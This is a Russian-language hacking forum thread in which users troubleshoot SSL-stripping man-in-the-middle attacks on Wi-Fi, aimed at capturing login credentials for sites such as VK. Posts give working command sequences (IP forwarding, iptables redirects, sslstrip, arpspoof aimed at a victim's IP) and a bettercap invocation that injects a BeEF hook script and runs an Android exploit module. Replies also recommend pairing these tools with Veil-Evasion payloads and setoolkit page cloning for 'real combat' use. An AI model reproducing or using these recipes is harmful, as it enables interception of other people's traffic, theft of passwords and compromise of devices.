Подменна HTTPS на HTTP

Тема в разделе "Взлом Wi-Fi", создана пользователем Kiagen, 26 май 2016.

  1. Kiagen

    Kiagen Member

    Регистрация:
    4 май 2016
    Сообщения:
    18
    Симпатии:
    3
    юзаю вот это ПО bettercap ettercap wireshark Sslstrip ARPspoof ничего не получается делаю все так же как написано в инструкции или в видео ничего не выходит )помогите пжл)
     
  2. Вадим

    Вадим Active Member

    Регистрация:
    11 май 2016
    Сообщения:
    27
    Симпатии:
    11
    поконкретнее плиз, что делал, как делал, что не получается??
     
  3. Kiagen

    Kiagen Member

    Регистрация:
    4 май 2016
    Сообщения:
    18
    Симпатии:
    3
    Ну во первых юзал bettercap включил bettercap --proxy - P POST чтоб захватывало все устройства та и по отдельности делал и заметил что работает только если прописывать адрес в адресной строке например vk.com подмена протокола произойдет но если зайти в гугл и в гугле ввести vk.com и перейти то никакой замены не будет но люди же заходят в вк как ? они пишут "мл" а гугл уже выводит их на вк ,или же по закладкам или просто пишут Вк/вконтакте и через гугл потом заходят )потом юзал sslstrip т.е включил форвардинг пакетов echo "1" > /proc/sys/net/ipv4/ip_forward потом настроил IPtables iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 потом запустил sslstrip на прослушку порта заданого 8080 sslstrip -l 8080 потом включил ARPspoof командой arpspoof -i wlan0 -t 192.168.0.103 192.168.0.1 ГДЕ 192.168.0.103 IP жертвы а 192.168.0.1 IP роутера и ничего не работает ) потом делал чуть по другому ) включил форвардинг настроил IPtables включил sslstrip включил ettercap выбрал интерфейс просканил сеть выбрал роутер и пк включил MITM и тоже ничего не пашет ( а иногда при включении ettercap на компе жертвы пропадает интернет ) ВОТ ТАК крч ( все делал на своих ноутбуках ноут атакуещего Kali linux rolling с последними обновами жертва как и на Windows 7 была так и на Windows 10 была )
     
  4. Вадим

    Вадим Active Member

    Регистрация:
    11 май 2016
    Сообщения:
    27
    Симпатии:
    11
    А почему ты выбираеш роутер, надо выбирать IP атакующего и IP жертвы
     
  5. Kiagen

    Kiagen Member

    Регистрация:
    4 май 2016
    Сообщения:
    18
    Симпатии:
    3
    0_0 сейчас попробую ведь на всех видео говорят вот так : на 9.50 глянь он как раз таки сделал так как я и написал
     
  6. kuklofon

    kuklofon Parrot Security OS
    Команда форума

    Регистрация:
    28 фев 2016
    Сообщения:
    219
    Симпатии:
    117

    посмотри мой видос, может получится.. тестил на виртуалке, всё работает
     
  7. /\/\17R4

    /\/\17R4 Member

    Регистрация:
    16 апр 2016
    Сообщения:
    5
    Симпатии:
    4
    Попробуй так:
    1)Сначала обнови gems на всякий случай - gem update (можно вообще установить bettercap из гемов - gem install bettercap)
    2)Качни доп. модули bettercap - git clone https://github.com/evilsocket/bettercap-proxy-modules.git
    3)На мой взгляд команда на запуск в твоём случае должна выглядеть так - sudo bettercap -I wlan0 -G 192.168.0.1 -X --random-mac --sniffer-output ~/target_essid.cap --proxy --proxy-https --proxy-module injectjs --js-url http://127.0.0.1:3000/hook.js (в случае использования в связке с beef/beef+metasploit) --proxy-module ~/bettercap-proxy-modules/http/androidpwn.rb --command whoami (в случае если в сети андройд устройства)
     
    Decode нравится это.
  8. kot-gor

    kot-gor Well-Known Member
    Команда форума

    Регистрация:
    7 сен 2016
    Сообщения:
    136
    Симпатии:
    70
    Вышеуказанные методы неплохо справляются с логином и паролем, отправленные методом POST, и в принципе я особо не удивлен что человек не добился желаемого результата, сам прошел через похожие грабли...)Попробую пояснить, причина в том, что вы делали это не на виртуальной машине, а на реальном компьютере на котором уже входили на сайт " в контакте", и ваша система запомнила ваш вход. Если вы сделаете на чистой виртуальной машине у вас все получиться... По поводу ettercap , забудьте его, я считаю эту утилиту пережитком прошлого. и долго и муторно... Юзайте mitmf либо bettercap. Да кстати, иногда подвисает , вышел из этого включением IP forwarding перед запуском bettercap. Если же говорить про реальные боевые условия то запуская Bettercap строкой "bettercap --proxy - P POST" вы много не получите..). Советую использовать Bettercap в связке с Beef и Veil-Evasion ,либо как вариант Bettercap в режиме dns спуфинга и в связке с setoolkit (легко делает клон нужной веб страницы). Вариантов множество, все зависит от вашей фантазии, знаний и упорства...


     
    kuklofon нравится это.
  9. mrx13

    mrx13 Member

    Регистрация:
    31 авг 2016
    Сообщения:
    10
    Симпатии:
    0
    так же еще могу порекомендовать софт под названием Intercepter-NG довольно-таки интересный софт, тоже может работать с клонированием страниц:)
     
  10. kot-gor

    kot-gor Well-Known Member
    Команда форума

    Регистрация:
    7 сен 2016
    Сообщения:
    136
    Симпатии:
    70
    Добрый вечер.Раз уж затронули тему,может у кого есть опыт проведения mitm на андройд версии выше 4.2 ? С положительным результатом и родным браузером...
     
Загрузка...

Поделиться этой страницей